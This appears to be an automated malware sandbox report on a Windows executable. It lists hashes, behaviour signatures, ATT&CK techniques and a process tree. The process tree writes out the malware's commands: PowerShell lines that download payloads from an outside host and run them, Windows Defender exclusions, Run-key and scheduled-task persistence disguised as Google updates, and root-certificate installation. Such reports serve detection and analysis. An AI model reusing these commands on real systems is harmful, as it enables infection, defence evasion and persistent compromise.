0670da9632a6639007d68c910a1bfdcca8ab9157324a65ce45bda3136f365a3c

Analysis

max time kernel
70s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
21/09/2022, 06:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

303359be5a96f2404af7e635640b257d.exe
Size

138KB
MD5

303359be5a96f2404af7e635640b257d
SHA1

eed5a46a5605103022aee765c65b0edae9d33ebf
SHA256

0670da9632a6639007d68c910a1bfdcca8ab9157324a65ce45bda3136f365a3c
SHA512

526f035c53e3d5c6289f08dae106e8c955e83d1503a4bfd906e3f6997ee45f10cc942b55850e214036fbd560a568a3b4580eed4ad7d80977d2daa0e4681a00fc
SSDEEP

3072:rw7s+ebZ7usUCAco7ILE0+50u+kKVzdCf/z8:rn+ebTUCAco7IZLYCZI/

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe

Executes dropped EXE 5 IoCs

pid	Process
4332	unzip.exe
4344	unzip.exe
4748	unzip.exe
4712	unzip.exe
1352	unzip.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	303359be5a96f2404af7e635640b257d.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5008	schtasks.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
376	reg.exe
2800	reg.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	unzip.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	unzip.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	unzip.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	unzip.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	unzip.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	unzip.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	unzip.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	unzip.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	unzip.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4360	303359be5a96f2404af7e635640b257d.exe
4360	303359be5a96f2404af7e635640b257d.exe
4360	303359be5a96f2404af7e635640b257d.exe
4360	303359be5a96f2404af7e635640b257d.exe
4360	303359be5a96f2404af7e635640b257d.exe
4712	unzip.exe
1352	unzip.exe
4748	unzip.exe
4344	unzip.exe
4332	unzip.exe
4748	unzip.exe
4332	unzip.exe
1352	unzip.exe
4712	unzip.exe
4344	unzip.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4360	303359be5a96f2404af7e635640b257d.exe
Token: SeDebugPrivilege	1352	unzip.exe
Token: SeDebugPrivilege	4344	unzip.exe
Token: SeDebugPrivilege	4748	unzip.exe
Token: SeDebugPrivilege	4712	unzip.exe
Token: SeDebugPrivilege	4332	unzip.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 4360 wrote to memory of 4420	4360	303359be5a96f2404af7e635640b257d.exe	92
PID 4360 wrote to memory of 4420	4360	303359be5a96f2404af7e635640b257d.exe	92
PID 4420 wrote to memory of 2656	4420	cmd.exe	94
PID 4420 wrote to memory of 2656	4420	cmd.exe	94
PID 4332 wrote to memory of 3680	4332	unzip.exe	96
PID 4332 wrote to memory of 3680	4332	unzip.exe	96
PID 4332 wrote to memory of 3680	4332	unzip.exe	96
PID 4748 wrote to memory of 3004	4748	unzip.exe	95
PID 4748 wrote to memory of 3004	4748	unzip.exe	95
PID 4748 wrote to memory of 3004	4748	unzip.exe	95
PID 3680 wrote to memory of 2448	3680	cmd.exe	97
PID 3680 wrote to memory of 2448	3680	cmd.exe	97
PID 3680 wrote to memory of 2448	3680	cmd.exe	97
PID 3004 wrote to memory of 376	3004	cmd.exe	98
PID 3004 wrote to memory of 376	3004	cmd.exe	98
PID 3004 wrote to memory of 376	3004	cmd.exe	98
PID 4748 wrote to memory of 4312	4748	unzip.exe	99
PID 4748 wrote to memory of 4312	4748	unzip.exe	99
PID 4748 wrote to memory of 4312	4748	unzip.exe	99
PID 4312 wrote to memory of 2800	4312	cmd.exe	100
PID 4312 wrote to memory of 2800	4312	cmd.exe	100
PID 4312 wrote to memory of 2800	4312	cmd.exe	100
PID 4332 wrote to memory of 4788	4332	unzip.exe	101
PID 4332 wrote to memory of 4788	4332	unzip.exe	101
PID 4332 wrote to memory of 4788	4332	unzip.exe	101
PID 4788 wrote to memory of 1116	4788	cmd.exe	102
PID 4788 wrote to memory of 1116	4788	cmd.exe	102
PID 4788 wrote to memory of 1116	4788	cmd.exe	102
PID 1352 wrote to memory of 3192	1352	unzip.exe	110
PID 1352 wrote to memory of 3192	1352	unzip.exe	110
PID 1352 wrote to memory of 3192	1352	unzip.exe	110
PID 3192 wrote to memory of 5008	3192	cmd.exe	111
PID 3192 wrote to memory of 5008	3192	cmd.exe	111
PID 3192 wrote to memory of 5008	3192	cmd.exe	111
PID 1352 wrote to memory of 2104	1352	unzip.exe	112
PID 1352 wrote to memory of 2104	1352	unzip.exe	112
PID 1352 wrote to memory of 2104	1352	unzip.exe	112

C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe
"C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4360
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2656

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3680
- - C:\Windows\SysWOW64\netsh.exe
    netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
    3⤵
    PID:2448
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4788
- - C:\Windows\SysWOW64\netsh.exe
    netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
    3⤵
    PID:1116

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'unzip.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:376
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds policy Run key to start application
    - Modifies registry key
    PID:2800

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo2.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3192
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
    3⤵
    - Creates scheduled task(s)
    PID:5008
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
  2⤵
  PID:2104

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Google\unzip.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
